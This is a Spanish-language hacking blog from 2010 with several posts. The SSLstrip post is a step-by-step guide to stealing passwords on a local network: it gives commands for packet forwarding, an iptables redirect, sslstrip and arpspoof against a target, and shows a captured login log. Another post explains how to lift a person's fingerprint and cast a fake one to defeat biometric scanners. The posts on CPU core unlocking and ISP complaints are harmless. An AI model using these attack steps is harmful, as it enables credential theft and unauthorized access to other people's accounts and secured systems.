Su dirección IP xx.xx.xx.xx se encuentra descargando xxxxx bytes del archivo XX. Por favor finalice esta descarga antes de iniciar otra.

o alguna parecida... esta lleno en los foros de usuarios preguntando porque les sale ese error o no pueden correr servers de juegos... o algun newbie practicando con troyanos de conexion inversa q no puede forwardear puertos. ahi tienen la respuesta, estan todos en una gran LAN (Local Area Network) barrial...

ademas, por mas q nos acostumbremos a esto y quieran explotarlo al maximo el NAT tambien tiene limite. 1 IP puede usar un maximo de 65536 (FFFFh) puertos, o sea q puede abrir ese numero de conexiones, si se superan quedan encoladas hasta q se libere alguna.

ni hablar del q quiera tener un simple FTP, o algo tan normal hoy en dia como una conexion a la pc de tu casa (hace años q no podria vivir sin ella), pagar una ip publica va a ser como pagar ahora una conexion dedicada.

se dice q tanto los grandes operadores de usa como las organizaciones gubernamentales ya estan listas para empezar el proceso, google y facebook parecen estar tambien en el camino y en europa y asia hay algunos equipos q ya empezaron a ejecutarlo.

en latinoamerica tambien tenemos algunas redes trabajando en v6 aunque al usuario final llegan en v4. aca la lista de quienes lo tienen implementado o estan en eso a dia de hoy:

conclusion

no se... q estamos esperando? a cuanto va el contador mientras leen esto? ya llego a 0?

SSLSTRIP - Como conseguir cualquier password sin despertar sospechas en 1 lan.

2010-11-25T21:49:00.015-03:00

esta tecnica fue presentada en el black hat dc 2009 por moxie marlinspike y desperto bastante revuelo, no era nuevo como ataque pero si la herramienta que lo automatiza y lo hace mucho mas facil.

pero esto es del año pasado! diran... y encima pongo q es mas viejo, como es posible entonces q siga funcionando y nadie lo parchee. muy facil, no es 1 ataque directo al ssl sino que lo q hace es reemplazar todos los links https x http seguido de 1 ataque mitm como el q vimos en este link:

ARP Poisoning

de esta manera el objetivo se comunica con nosotros x http y nosotros con el servidor de destino x https, obteniendo en el proceso todas las passwords en texto plano q despues enviamos encriptadas a su destino final.

con esto salvamos el problema de certificados q tenemos usando ettercap como habiamos visto aca:

Packet sniffing

haciendo transparente el logueo para el objetivo... peligroso no?...

preparando el sistema

voy a explicarlo para debian/ubuntu, si tienen fedora o derivados cambien x yum. 1ero instalamos python y python-twisted-web:

apt-get install python python-twisted-web

despues descargamos sslstrip, pueden buscar algun link o bajarlo de la pagina del autor:

http://www.thoughtcrime.org/software/sslstrip/

podemos hacer 2 cosas, instalarlo o correrlo desde el directorio de descarga. para instalarlo:

python ./setup.py install

de esta manera queda accesible desde la consola, sino para ejecutarlo:

python sslstrip.py (opciones)

el ataque

lo 1ero es activar el reenvio de paquetes, esto lo hacemos cambiando de 0 a 1 el valor del archivo ip_forward q se encuentra en /proc/sys/net/ipv4/, editandolo o simplemente poniendo en la consola:

echo "1" > /proc/sys/net/ipv4/ip_forward

despues configuramos iptables para q reenvie el trafico a ssltrip, el puerto q queremos redirigir es el 80 hacia el 10000 q es el default del programa. si quieren usar otro puerto x alguna razon este es el momento de elegirlo, despues al lanzarlo se puede cambiar. el comando seria:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (o el q quieran)

ahora corremos sslstrip, si lo instalaron simplemente:

sslstrip -w nombrearchivo

donde "nombrearchivo" es 1 nombre para el archivo donde van a quedar logueados los datos. si cambiamos el puerto usamos el modificador -l:

sslstrip -w nombredearchivo -l numdepuerto

si todo esta bien instalado deberiamos ver esto:

sslstrip 0.6 by Moxie Marlinspike running...

ahora solo falta hacer el envenenamiento arp para q la otra maquina nos mande su trafico, podemos usar exactamente el mismo metodo de la entrada q cite antes y el resultado simplemente seria q el objetivo no tendria el famoso mensaje del certificado ya que el trafico pasaria x el puerto 80, el user/pass saldria en la pantalla inferior como cualquier pass de texto plano y a su vez se puede ver en el log de ssltrip:

2010-11-25 19:48:39,529 SECURE POST Data (www.google.com):

ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%

2F%3F&service=mail&rm=false&dsh=3151454474180978812&ltmpl=default&hl=en

&ltmpl=default&scc=1&ss=1&timeStmp=&secTok=&GALX=HirBaqYb1RQ&Email=

ACA_SALE_EL_CORREO&Passwd=ACA_LA_PASSWORD&rmShown=1&signIn

=Sign+in&asts=

pero podemos hacerlo mas facil para no tener q usar ettercap simplemente instalando la suite dsniff:

apt-get install dsniff

dsniff daria como para otra entrada completa pero ahora vamos a usar solamente arpspoof para hacer el envenenamiento. despues de instalar dsniff ponemos en la consola:

arpspoof -i interface (eth0, wlan0, ath0 o la q sea) -t target (maquina objetivo) gateway (el router)

x ej:

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

en la consola veriamos algo como esto repetirse una y otra vez:

0:5:4e:4d:15:30 0:1e:e5:fc:10:65 0806 42: arp reply 192.168.1.1 is-at 0:5:4e:4d:15:30

0:5:4e:4d:15:30 es nuestra mac, q queremos q el objetivo (0:1e:e5:fc:10:65) crea q es el router, entonces lo q le decimos es q 192.168.1.1 (el router) esta en (is-at) nuestra mac (0:5:4e:4d:15:30)

si hacemos en el objetivo 1 arp -a vamos a ver que nuestra ip y el router tienen la misma mac, el envenenamiento tuvo exito.

sslstrip ya esta capturando trafico ssl y guardandolo en el log, solo hay q abrirlo y ver q hay...

SSLStrip by |_ocutus is licensed under a Creative Commons Atribución-NoComercial-SinDerivadas 3.0 Unported License.

Como vulnerar un sistema de Biometria - Huellas dactilares - by Alesteir

2010-07-14T17:09:00.025-03:00

este tutorial fue escrito x mi amigo Alesteir hace unos 2 años en 1 momento muy especial, en 1 foro q en su nombre lleva la palabra "hacker" pero ya no queda practicamente ninguno, si quedo mucho warez, porno y algo d offtopic.

los otros dias encontre este texto en 1 foro "administrado" x alguien q c negaba a este tipo d temas (sera xq no sabe ni usar 1 proxy xD) y ni siquiera c ponia la fuente.

no lo encontre completo (y con su fuente correspondiente) en ningun otro lado d la red y me parecio justo q tenga su lugar con el nombre d su autor bien claro.

Burlando Biometria By Alesteir

A Continuación os enseñare un método a seguir para falsear huellas dactilares o digitales (como le llaman algunos), lo cual es un método mas para vulnerar cualquier sistema basado en seguridad biométrica de huellas digitales y por ende es de aplicación neta al hacking y a los sistemas informáticos. Para poder falsificar cualquier huella necesitamos encontrar la original primero (es aca donde se puede recurrir a la ingeniería social para conseguir la huella deseada , jejejeje), además de que es necesario poder tener una buena impresión.

Es aquí donde entra el rollo de la ciencia forense. Hay que entender que las huellas estan compuestas por crestas papilares, son estas crestas -las elevaciones- y surcos (las grietas), las que le dan esa característica única a cda huella, ya que ninguna huella es igual a otra, asi sean de la misma persona, y son los distintos recovecos y formas de estos elementos, los que las hacen únicas e irrepetibles, y para hacer dictamenes se necesitan una cantidad determinada de puntos característicos coincidentes para poder dar un correcto resultado, la clasificación de estos puntos, su topografia, añadidas a otras cuestiones tecnicas son las que forman las bases de la dactiloscopia como ciencia, es por eso que se han usado y se siguen usando las huellas digitales como un método de identificación personal, es sabido que recientemente se usan en cuestiones de biometría, aplicadas a la seguridad en general), hay que tener en cuenta que es la presión ejercida (al tener contacto con superficies de distinto tipo tales como: espejos, vasos y envases, picaportes, vidrios, acetatos, pantallas de pcs y muchos objetos mas), la que determina de que una huella se imprima en una superficie, es cierto que existen otros factores mas que influyen a que una impresión sea buena o no (el polvo es una de ellas), y este es uno de los items determinantes a la hora de hacer una recolección de huellas dactilares (ojo, que las partes lisas -por lógica- son los focos mas frecuentes para encontrar buenas huellas (para clasificar una huella como buena debe verse tan siquiera un 75 % de la misma, aunque también se pueden hacer reconstrucciones a partir de fragmentos) , nunca encontraríamos una huella en una superficie rugosa y con porosidades, ya que no se tendría el suficiente contacto por parte de las crestas de la huella con la superficie. En unas imágenes que se ven mas abajo, se ve una buena impresión dactilar(después de revelada lógicamente), por lo tanto nos valdremos de objetos y elementos caseros, pero que serán efectivos a la hora de hacer una recolección, para posteriormente ser usada, he de advertir que el uso que se le de a esta información solo depende de cada cual.

El método hacer una huella visible mas usado desde hace mucho es el de aplicarle un poco de carbón en polvo (el cual lo podemos hacer con un poco de carbón vegetal –pulverizándolo y pasándolo por un cedazo, para dejarlo lo mas fino posible), otra forma es pasando la mina de un lápiz contra una lija, hasta obtener una cantidad suficiente:

A un pincel de esos que usan las mujeres para aplicarse el rímel en los pómulos (debe ser muy suave y fino) lo untamos con el polvo revelador, y lo pasamos muy suave por el lugar donde se aprecia la huella dactilar.

Otra método muy casero también pero muy efectivo es: echar unas gotas de pegante instantáneo dentro de una tapa plástica de agua mineral, y lo ponemos sobre la impresión de la forma en que se aprecia en las siguientes imágenes:

El principal ingrediente del pegante superglue produce una superficie blanca sobre la huella (mas concretamente sobre la grasa), revelándola a nuestros ojos y permitiéndonos hacer una recolección, bien sea física o de soporte fotográfico:

La siguiente parte envuelve la recolección física (En caso de que no contemos con cámara digital, pero esta parte la omito por el momento), la cual se hace con un poco de papel Contac, el proceso se hace pegando el papel sobre la impresión ya revelada, una vez la tenemos, procedemos a poner el Contac de nuevo sobre el papel blanco que lo recubre, la escaneamos y seguimos con el procedimiento para hacer el molde para hacer cuantas veces queramos nuestra huella, La clave de todo el proceso es lograr capturar o recolectar una huella fidedigna y casi exacta a la original, la cual al final es la que nos permitirá hacernos con nuestra goma o huella postiza lista para usar, para ello debemos usar un papel acetato transparente, del usado en los proyectores e imprimir las huellas con una impresora laser (es la capa que deja el toner al imprimir la clave de todo el cuento):

La impresora laser deja un pequeño pero eficiente relieve para nuestros designios que por cierto imprime la huella al revés, y como lo que necesitamos es un negativo, pues genial) esto es lo que vamos a aprovechar para crear nuestra goma:

Una vez tenemos las impresiones dactilares en el acetato procedemos a cubrir la huella con un poco de pegante para madera o Colbon que llaman:

(para hacerlo mas manejable, le agregamos un poco de glicerina)

Repartimos bien el pegante hasta formar una capa, esperamos a que se seque el pegante.

Separamos la goma seca de la hoja de acetato.

La recortamos al tamaño de nuestro dedo.

Ya para terminar con un poco de pegante natural o de teatro pegamos nuestro huella falseada a nuestro propio dedo

Listo!, ya tenemos nuestra huella trucada ¡

Como pagar un Phenom II x2 y tener un Phenom II x4 (Core unlocking)

2010-06-29T18:17:00.018-03:00

a quien no le gustaria pagar casi la mitad x un micro d 4 nucleos? bueno... no es muy dificil, en la mayoria d los ultimos modelos d AMD se pueden liberar nucleos ocultos.

como a la gente le gusta cada vez mas "tocar" el hardware, los motherboards vienen con mas y mas opciones para manejar voltajes y frecuencias y eso hace q c puedan hacer cosas interesantes. lo q antes era 1 dolor d cabeza cuando teniamos q meter jumpers para configurar dmas, irqs, multiplicadores y otras porquerias, ahora aparece como opcion en casi cualquier mobo q c respete.

hace unos meses vole mi mobo asus mn2-sli deluxe... chipset... irreparable, en su momento lo pague algo asi como 250usd, no duro 3 años. conclusion despues d llevarlo a un ingeniero q fue el ultimo recurso, no comprar mobos caros, son los q mas c rompen y los q menos c pueden reparar, un asus standard es suficiente. entonces fui y compre un modesto M4A785-M.

tenia 1 athlonX2 5600 q d paso decidi cambiar, las opciones estaban entre un phenomII x3 o x4. el x4 era el 920 y el x3 720 pero "black edition", entre otras cosas es altamente overclockeable y la diferencia d precio era mucha asi q fui x el ultimo.

... suerte q compre s xq ahora es 920, y lastima q no compre el x2 550 o 555 xq hubiera sido lo mismo pero mas barato todavia xD

binning

"binning" es el proceso q hace el fabricante para testear los chips y asignarlos segun los resultados a la linea d productos q le corresponde. los chips q soportan altas velocidades con todos sus cores funcionando a la perfeccion van a la linea d punta, los q fallan c van asignando a velocidades a las q c comportan d manera estable y del mismo modo c desactivan los cores q presentan fallas.

esto x supuesto no es tan asi, cuando c lanza una nueva linea hay muchos fallos en la produccion q despues c van corrigiendo hasta q 1 porcentaje muy bajo presenta fallas. como todos los micros son fabricados con 4 nucleos llega un momento q por razones d mercado hay q desactivar si o si algunos para vender los x2 y x3... no todo el mundo (como yo) quiere gastar lo q vale el x4.

en la foto d arriba c pueden apreciar perfectamente los 4 nucleos en el 550.

AMD

en realidad AMD nunca tuvo una posicion demasiado clara sobre el tema, x 1 lado c beneficia con las ventas ya q mucha gente compra x2 y x3 ya q termina siendo una alternativa baratisima frente al quad-core d intel q cuesta una fortuna. x otro lado c hablo en 1 momento d q estaban forzando a algunos fabricantes d mobos a blockear la opcion en futuras actualizaciones d bios, cosa q parece q no paso con asus xq el mio tiene bios d enero d este año y desblockeo sin problemas.

c hacen cargo d todo el tema y x supuesto no ofrecen ningun soporte ante fallas en el desblockeo, si ellos lo blockearon x algo sera ;)

tambien puede no funcionar...

antes del proceso aviso q esta la posibilidad d q realmente tengan 1 o 2 cores dañados, la verdad q me parece bastante remota si es nuevo xq antes q el mio probe algunos y todos funcionaron, pero puede pasar.

el problema mas grave es q no bootee la maquina al hacer el cambio, ante esto con 1 simple reset d bios alcanza para tenerla otra vez funcionando, tengan a mano el manual del mobo x las dudas...

tambien puede arrancar y despues ser inestable, aca ya entramos en otro terreno. tal vez c pueda llegar a estabilizar subiendo el voltaje al micro pero no recomiendo tocar esas cosas si no saben lo q estan haciendo. el sintoma son cuelgues, pantallas azules en win, etc. en 1 palabra... inestabilidad.

motherboard

el mobo tiene q soportar la opcion ACC (Automatic Clock Calibration) o NCC (NVidia Clock Calibration) q es la respuesta de nVidia a esta nueva "moda". hay distintos modelos d chipsets q lo permiten segun la marca yendo desde precios economicos hasta la alta gama. busquen la opcion en el bios, o si van a comprar haciendo una busqueda en google c pueden checkear los modelos con soporte.

esta es 1 pequeña lista d mobos en los que se llevo a cabo el proceso con exito:

Asus

GeForce 8300
M4N78 Pro - 1004 Official Bios

nForce 980a SLI
M4N82 Deluxe - 0906 Official Bios

770G/SB710
M4A77TD PRO - 1007/0316 Official Bios

785G/SB710
M4A785D-M PRO - 405 Official Bios
M4A785M - 0503 Official Bios

785G/SB750
M4A785TD-V EVO - 0410/0602 Official Bios

790X/SB750
M4A79XTD EVO - 0605/0704 Official Bios

790FX/SB750
M3A79-T Deluxe – 0030 Mod Bios
M4A79 Deluxe – 1602 Official Bios
M4A79T Deluxe – 0079 Mod Bios/1801 Official Bios
Crosshair III Formula - 0702 / 1003

790GX/SB750
M3A78-T – 0023 Mod Bios
M4A78-E – 1204/1803 Official Bios
M4A78-E SE – 0023 Mod Bios
M4A78T-E – 1402 Official Bios

890GX/SB850
M4A89GTD-PRO/USB3 - 0307 Official Bios

Asrock

780G/SB710
A780GMH/128M - 1.50 Bios

785G/SB750
A785GMH/128M - 1.00 Bios

790GX/SB750
AOD790GX/128M – 1.40 Bios
A790GMH/128M - 1.20 Bios
A790GXH/128M – 1.20 Bios
A790GX/128M - ???

Biostar

785G/SB710
TA785GE 128m - 88GCO720CE Mod Bios

790GX/SB750
TA790GXBE
TA790GX A3+ - 78DAA616 Mod bios
TA790GX 128M – 78DEA113 Official bios
TA790GX3 A2+ - A78DA113
TA790GX A2+ - 78DBA113 Official bios - SUCCESS!!

DFI

790FX/SB750
DK 790FXB-M3H5 – 04/02/2009 Bios
DK 790FXB-M2RSH – 03/10/2009 Bios
DK 790FXB-M2RS - 02/24/2009 Bios

790GX/SB750
JR 790GX-M2RS – 10/30/2008 Bios – SUCCESS!!

Gigabyte

nForce 720D
GA-M720-US3 - F4 Bios

760G/SB710
GA-MA78LM-S2 - F1 Bios

770X/SB710
GA-770TA-UD3 - F1 Bios
GA-MA770T-UD3P - F2c/F3 Bios

785G/SB710
GA-MA785GM-US2H - F5 bios
GA-MA785GMT-UD2H - F3/F5 Bios

785GX/SB750
GA-MA785G-UD3H - F1/F5b Bios
GA-MA785GT-UD3H - F4/F5a Bios
GA-785GMT-USB3 - F1 Bios

790X/SB750
GA-MA790X-UD3P - F4 Bios
GA-MA790X-UD4 – F3 Bios
GA-MA790X-UD4P – F5/F7/F9 Bios
GA-MA790XT-UD4P - F4G/F5/F6/F7 Bios

790FX/SB750
GA-MA790FX-UD5P - F4c Bios
GA-MA790FXT-UD5P – F3b/F5 Bios

790GX/SB750
GA-MA790GP-DS4H – F3h Bios
GA-MA790GP-UD3H - F1 Bios
GA-MA790GP-UD4H – F3h Bios
GA-MA790GPT-UD3H - F2 Bios

MSI

770X/SB710
770-C45 – 1.3 Offical Bios/1.3B2 Special Bios/10.2

785G/SB710
785GT-E63 - 28.0 08/13/2009 Bios
785GTM-E45 - 8.0 09/07/2009 Bios
785GM-E65 - 2.3 Official Bios

790FX/SB750
790FX-GD70 – 1.5B1/1.5B2/1.5B3/1.7 Bios

790GX/SB750
790GX-G65 – 1.4B2 Special Bios
DKA790GX - 1.8 Bios for Platinum version of mobo
DKA790GX Platinum – 1.9b2 Bios

KA790GX - No funciona
KA790GX-M - No funciona

estos 2 ultimos mobos a pesar d tener el southbridge sb750 q es capaz d desbloquear tienen la opcion anulada.

micro

el micro depende d lo q quieran gastar y lo q quieran tener, los phenomII x2 y x3 son desbloqueables a x4 y los x4 con un poco d suerte a x6. para los q quieran gastar menos los sempron tambien son desbloqueables, x ej el sempron 140 c puede llevar a athlonII X2.

para comprar yo compraria un x2 550 o 555 black edition por la relacion calidad/precio. hay q tener en cuenta q esta edicion esta hecha para soportar overclocking y x lo tanto es mas estable q uno comun, 130usd aprox me parece un muy buen precio x 4 nucleos.

el proceso

el proceso es el mas sencillo del mundo, solo hay q buscar la opcion en el bios y ponerla en auto. en el caso del M4A785-M fui a "advanced" y dentro d la conf del micro a:

ADVANCED CLOCK CALIBRATION -> AUTO

con esto c abrio otra opcion llamada "unleashing mode", tambien la active:

UNLEASING MODE -> ENABLED

y despues aparecio donde pregunta si c quieren usar 3 o 4 cores:

ACTIVE CPU CORES -> 4 CORE OPERATION

al reiniciar me salio el msg "4 cores are activated" y despues d unas horas d test parece q todo esta ok.

ANTES

DESPUES

no c fijen en las velocidades y el multiplicador, esta activado cool&quiet como c puede ver x las diferencias d voltaje y eso hace q cambien segun el requerimiento del sistema.

ahhh.... y 1 vez mas, gracias amd!! ;)

Fibertel, Speedy y Telecentro (Argentina) - Como hacer para que no nos roben tanto los proveedores de internet.

2010-06-06T13:42:00.007-03:00

es 1 realidad no solo en argentina sino en la mayoria d los paises q los proveedores d internet, a los cuales llamaremos ISP (Internet Service Provider) d ahora en adelante, no dan el servicio d deberian. a mucha gente no le importa lo mas minimo mientras puedan usar el msn y no tarden mucho en subir sus fotos a facebook, tal vez el problema mayor empieza cuando c cuelgan los videos d youtube... je

lo cierto es q la velocidad casi nunca es la q deberia ser (sobre todo en horarios pico) y q si pagamos x 1 servicio eso es lo q deberiamos recibir exactamente, mas alla d q el msn funcione o no. tambien estan los problemas d cortes d servicio, desconexiones, mala calidad, etc, pero eso ya es otra historia.

solamente voy a hablar d los 3 isp del titulo xq son los q tuve mas experiencia directa, los demas tienen sus cosas tambien pero no voy a hablar x boca d 3eros sino x experiencia propia. podria agregar a telmex, pero solo conozco los servicios corporativos. como comentario, no funciona mal, pero los dias d tormenta olvidense d la conexion...

Precios

los precios obviamente estan infladisimos, piden cerca d 140 o 150$ argentinos (casi 40usd) x una conexion d 3mbps. eso x supuesto "sin promocion" o "despues d terminada la misma". Todos los ISP dan promociones x 6 meses a mitad d precio y despues empiezan a cobrar el monto total.

la mayoria sabemos (o quiero pensar q la mayoria) q si estamos en una zona donde podemos elegir, simplemente aceptamos la promocion y en el ultimo mes pedimos la baja, con lo cual nos llama atentamente nuestro ISP unos dias antes d finalizar y nos ofrece una nueva promo, tal vez mas jugosa q la anterior. garantizo q lo hacen, sino saben q lo unico q tenemos q hacer es cambiar d proveedor x 6 meses y despues volver con otra promo.

al darse cuenta d la situacion simplemente la extienden. en fiber es automatico despues d 1 par d veces d amenazar con la baja, directamente al finalizar extienden la promo x 6 meses o 1 año. pero si nadie dice nada ni amenaza con irse x supuesto q pasan a cobrar el precio full.

x ej en fibertel estuve pagando durante casi 2 años la mitad del precio (unos 60$), cuando hace unas semanas pedi la baja x enesima vez (pero ahora d verdad) me llegaron a ofrecer cable mas 3mbps a 150$ final. asumiendo q el cable cuesta unos 120$, la conexion d 3mbps me la estarian cobrando 30$??? xD

Velocidad

el tema d la velocidad varia en cuanto a zonas pero aun pudiendo tener una buena conexion por nuestra situacion geografica, es posible llegar a tener una malisima si no la checkeamos. cuando fiber subio la velocidad d 1 a 3mbps funcionaba peor q antes. esa fue una d mis 1eras peleas con ellos q termino en 1 año a 50$.

este problema es mucho mas dificil d solucionar q el del dinero ya q para la mayoria d los "mortales" es 1 misterio como funciona internet y como saber cuanta velocidad tiene y cuanta deberia tener, y x supuesto los isp tratan d mantener este "misterio" todo lo q pueden hablando a los "profanos" con terminos q dan risa sobre problemas q dan todavia mas. la placa d red, virus, el cableado, rayos cosmicos... cualquier causa es buena para confundir al usuario y q no moleste mas x un rato.

ojo... esto no quiere decir q estos problemas no puedan existir (salvo x los rayos cosmicos), pero el 99% d las veces el problema es d ellos.

tenemos 2 tipos d conexiones diferentes entre estos proveedores, speedy es adsl y fiber y telecentro cable, el adsl corre x la linea telefonica y el cable como es obvio x la red q le corresponde. la gran diferencia entre estos 2 servicios es q el adsl tiene una conexion punto a punto hacia la central y el cable no, el cable conecta x sectores a un nodo en comun, lo q hace q si hay muchas maquinas conectadas a s nodo c sature, como pasa en muchos lugares en el caso d telecentro, q es donde mas se puede apreciar el problema.

en este caso tenemos q lograr 1ero la velocidad prometida dentro del nodo para tener una remota posibilidad d tenerla despues hacia internet, si no la tenemos c crea el tipico "cuello d botella". todo esto c puede medir, c puede reclamar y llegado el punto c puede denunciar... o cuando menos usar para q nos arreglen el servicio o nos den algun "beneficio extra" en pago x las molestias.

Speedy

Personalmente con speedy fue con los q menos problemas tuve, tal vez xq fue d los 1eros y xq tenia conocidos en la empresa... je. El problema mayormente es el soporte, cuando funciona bien x lo gral queda asi y todo oka, el tema es lograr q alguien nos atienda si tenemos problemas.

speedy es d telefonica, telefonica ya todos sabemos lo burocratica q puede llegar a ser, llegue a hacerles denuncia en la CNC (Comision Nacional de Comunicaciones) para q muden mi linea d telefono a 2 cuadras d distancia despues d 7 meses!?!?...

con speedy es mas o menos lo mismo, si les funciona bien... recen para q siga asi y si no tienen otro proveedor en su zona... recen para q aunque sea funcione. speedy llega a muchos lugares donde no llega otro proveedor y esos usuarios son los q tienen los peores problemas, tipico d cualquier monopolio.

speedy nos proporciona 1 test d velocidad en su pagina, no es confiable pero es el 1er paso al hacer 1 reclamo, la "boca d la botella", si la conexion en s test no mide lo q tiene q medir nunca lo va a hacer contra 1 server real cuando quieran bajar algo.

si tienen speedy pueden checkear el 1er tramo d su conexion aca:

www.speedy.com.ar/medidor-de-velocidad/

mas adelante 1 test confiable para todos...

Fibertel

Con fibertel es mas o menos lo mismo, si haces q funcione bien no tenes mas problemas, pero para eso tenes q hacer 200 reclamos, anotarte todos los numeritos, pedir la baja y recien ahi t va a llamar alguien ofreciendo lo q quieras.

los del soporte no entienden nada la mayoria (como d costumbre), creo q hable con casi todos. a uno c le escapo una d las 1eras veces q llame la pagina d testeo, digo "c le escapo" xq despues extrañamente nadie me "invitaba" a hacer 1 test d velocidad, entonces les decia q "en una llamada anterior me pasaron esta pagina" y al mostrarles los resultados no podian inventar mucho.

la web para checkear la velocidad de fiber es esta:

http://sps.fibertel.com.ar/

si vamos a:

pruebas d velocidad -> download

encontramos 2 tipos d descargas, nacional e internacional. esto es muy bueno xq podemos mediante su propio test checkear tanto en servidores propios d fibertel como en servidores externos. x lo gral la descarga nacional es perfecta y el problema esta con la internacional, a pesar d ser cable fiber tiene mejor estructura q telecentro y no hay tanta saturacion en los nodos, igualmente 1ero es bueno checkear la nacional.

la internacional va cambiando periodicamente, pero x lo gral no tengo quejas, son servers normales d internet desde donde tranquilamente c podria estar descargando algo. en este momento la descarga 3 es 1 rpm del wireshark xD... andaran en cosas raras estos chicos? je

si la descarga no va a la velocidad q deberia o cerca, llamen, pidan 1 num d caso d soporte y anotenlos todos.

otro tema q daria mucho para hablar sobre fiber es el conocido blockeo d puertos. muchas cosas estan blockeadas, no llegue nunca a saber cuantas exactamente pero son bastantes. para un user normal no tiene mucha importancia, para uno avanzado puede llegar a traer bastantes problemas y en todo caso me parece una invasion a la conexion.

si yo quiero tener una casa con 3 puertas y viene el estado y me pone pared en 2 diciendo q necesito 1 sola y q asi es mas seguro... deberia dejar q lo haga? o deberia encargarme yo d decidir cuantas puertas quiero? ademas... no deberian x lo menos avisarme q estan clausurando mis puertas?

Telecentro

telecentro... telecentro... si, cai en la trampa d telecentro, como dije antes estoy en 1 zona con muchos isp y me gusta probar. cable digital, internet 3mbps y telefonia ip a 160$... barato no? xD

con la telefonia no tenia muchas esperanzas, c corta todo el tiempo, da ocupado, si le pongo el inalambrico hace 1 ruido terrible y no es el trafo, ni la linea d corriente, ni el cable, ni "ponele 1 filtro d rf", ni nada q c pueda calificar d "normal". el soporte dice "sr, es el telefono obviamente" a lo cual respondo "en este momento t hablo desde s telefono pero desde 1 linea tradicional y funciona perfecto"... silencio... me recomienda poner otro filtro... cruzamos un par d frases forzadas y le corto.

el dia d la instalacion cuando ponen el modem checkeo velocidad contra telecentro, todo ok, contra 1 servidor en usa, todo ok, europa, todo oka, firmo contento y creo q esta todo bien... gran error.

ya venia el fin d semana y no tuve mucha oportunidad d usar la conexion, a la semana siguiente x la tarde me parecio notarla lenta, checkeo y no llegaba al mega. al principio crei q me habian cambiado a 1mbps, despues me di cuenta q era problema d saturacion cuando c libero despues d las 12 d la noche.

la mayoria d los isps ante 1 problema asi alegan cualquier cosa (como rayos cosmicos) pero telecentro tiene el descaro d hacerse cargo, ante 1 correo al sopote (cansado d esperar q me atiendan x tel) con capturas d pantalla d las mediciones y 1 completa descripcion del problema me respondieron lo siguiente:

Estimado Sr.
Le informamos que gracias a su reclamo, y sumados a otros, se están preparando tareas abocándose al desperfecto que provoca fluctuación del ancho de banda en determinadas franjas horarias. Pedimos disculpas por el inconveniente. Esta información fue sacada gracias al RA XXXXXX.
Desde ya, muchas gracias.
Buenas días.

Departamento de Soporte Técnico
Telecentro S.A.
soporte@telecentro.net.ar
www.telecentro.com.ar
6380-9500

o sea... traducido:

Estimado Estafado.

Le informamos q su conexion nunca va a funcionar a lo q ud paga dado q no tenemos la estructura necesaria para el numero d clientes q poseemos. Seguiremos sumando clientes para tratar d pagar una estructura q cada vez queda mas chica.
Buenas? dias.

para q venden conexiones q no pueden dar?... en fin, veremos si c puede sacar algo d esto y sino... a cambiar d vuelta.

la pagina de telecentro para hacer test d velocidad es:

http://velocidad.telecentro.net.ar/

ahhh... el cable c v impecable, mucho mejor q cablevision y mas canales xD

Test de velocidad fiable

Los tests d velocidad d las paginas no son fiables xq no miden la velocidad en condiciones reales, el de telecentro es una mentira q jamas sale siquiera a internet, solo mide la velocidad dentro d su propia red... y aun asi no mide lo q deberia. esta sacado d la pagina q pongo a continuacion donde tienen 1 server propio. no digo q es 1 mentira x la medicion en si sino x las condiciones en q c hace.

para tener 1 medicion real tenemos q checkear contra servidores internacionales q es donde navegamos generalmente y d donde bajamos cosas o vemos videos. para hacer 1 medicion real vamos a esta pagina:

http://www.speedtest.net/

este es mi resultado en telecentro 1 sabado a la tarde... y dio bastante bien (ni comento el ping d 158ms en mi propia red...):

con esta conexion, baje d donde sea no voy a pasar los 2.1mbps en el mejor d los casos. la velocidad a miami.fl, usa x ej:

y a 1 server en leipzig, deutschland:

bastante lejos d lo prometido no? para hacer el test simplemente tienen q pinchar en uno d los servers y esperar q la pagina haga el resto.

al terminar provee d 1 link en la parte inferior junto con los resultados, haciendo click en "copy direct link" c carga en el portapapeles. este link es aceptado como un test valido para gran cantidad d instituciones a nivel internacional y es muy fiable.

Conclusion

todos los isps van a tratar d darles lo minimo posible, lo ideal es checkear q este todo ok y en caso d q no reclamar 1ero a ellos, si no solucionan el problema directamente a la CNC. en una entrada anterior hay algo d info d donde y como hacer la denuncia y les aseguro q da resultados, pueden verla aca:

|_ocutus&CNDC vs Samsung y |_ocutus&CNC vs Telefonica

packet sniffing... o como conseguir passwords (y otras cosas) en cualquier red.

2010-05-16T20:24:00.025-03:00

habia prometido hace unos meses 1 articulo sobre arp poisoning en la practica (ARP Poisoning), esto x supuesto llevo a agregar algo d sniffing y el sniffing a otras cosas asi q decidi dividirlo en varias entradas para mantener el orden y no hacerlo tan largo.

c recomienda leer el articulo anterior para tener idea d lo q estan haciendo y d esa forma poder desarrollar otro tipo d tecnicas asi como tener la posibilidad d usar cualquier soft q quieran ya q sabiendo el proceso c puede hacer d muchas maneras distintas.

este metodo es aplicable en cualquier red lan, no importa si tiene 2 o 2000 maquinas, no importa si son win o linux, si es cableada o wifi, si usan firefox, ie, opera o lo q sea... no importa casi nada, salvo q tengamos nuestra maquina conectada a la red.

packet sniffing

tambien llamado packet analysis es el proceso de capturar trafico de la red y analizarlo. aunque normalmente es asociado con actividades "hacker" el analisis d paquetes es una herramienta valiosisima para cualquier admin d redes, util para diagnosticar problemas q haya en la misma, asi como tambien detectar cualquier tipo d ataque, anomalia o hasta algun user q consume demasiado trafico... ;)

el trafico de red, como todos sabemos (o deberiamos saber si queremos hacer estas cosas), se divide en paquetes q cumplen distintas funciones. en la entrada anterior hablamos de los paquetes arp pero hay muchas otras clases. como seria 1 tema muy extenso (tal vez 1 futura entrada en el blog) dejo una animacion muuuyyy facil d entender para los q no tienen idea. la mayoria es aplicable, salvo algunas cosas en desuso como el viejo "ping d la muerte"...

entonces todo lo q tenemos q hacer es usar 1 sniffer para capturar s trafico y ver lo q nos interesa. con la tecnica del arp poisoning vimos q podemos engañar a 1 maquina para q crea q nosotros somos el router y al router para q crea q somos esa maquina, d esta forma nos "paramos" entre medio d las dos y realizamos el ataque llamado Man In The Middle (MITM). pero antes algunas aclaraciones.

verdades y mitos

